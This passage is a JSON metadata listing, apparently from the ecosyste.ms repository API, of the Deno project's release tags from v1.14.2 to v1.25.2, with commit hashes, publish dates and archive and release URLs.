denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"